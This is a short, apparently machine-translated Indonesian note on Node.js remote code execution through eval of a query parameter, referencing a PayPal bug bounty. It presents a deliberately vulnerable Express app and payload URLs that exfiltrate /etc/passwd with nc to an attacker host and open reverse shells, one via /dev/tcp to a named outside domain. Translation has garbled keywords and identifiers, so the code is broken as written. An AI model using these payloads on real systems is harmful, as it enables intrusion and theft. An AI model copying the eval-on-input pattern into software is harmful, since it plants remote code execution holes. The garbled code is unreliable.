Eksekusi kode jarak jauh nodeJS

latar belakang

@ArtSploit Saat menggali untuk PayPal, ditemukan bahwa kode nodejs dieksekusi, menghargai $ 10.000.

tes

 var express = membutuhkan ('express'); var app = express (); app.get ('/', function (req, res) {res.send ('hello eval (req.query.q)); console.log (req.query.q);}); app.listen (8080, function () {console.log (' contoh mendengarkan pada port 8080! ');});

Baca file apapun

 http: // host: 8080/? q = membutuhkan ('child_process') .exec ('cat+/etc/passwd+|+nc+penyerang+80')

Dapatkan shell

 http: // host: 8080/? q = var+net+=+membutuhkan ("net"),+sh+=+membutuhkan ("child_process") .exec ("/bin/bash"); var+klien+=+new+net.sock ET (); Client.Connect (80,+"Affecterip",+function () {client.pipe (sh.stdin); sh.stdout.pipe (klien); sh.stderr.pipe (klien);});

Dapatkan shell2

 http: // host: 8080/? q = membutuhkan ("child_process") .exec ('bash -c "bash -i>%26 /dev/tcp/wufeifei.com/7890 0>%261"')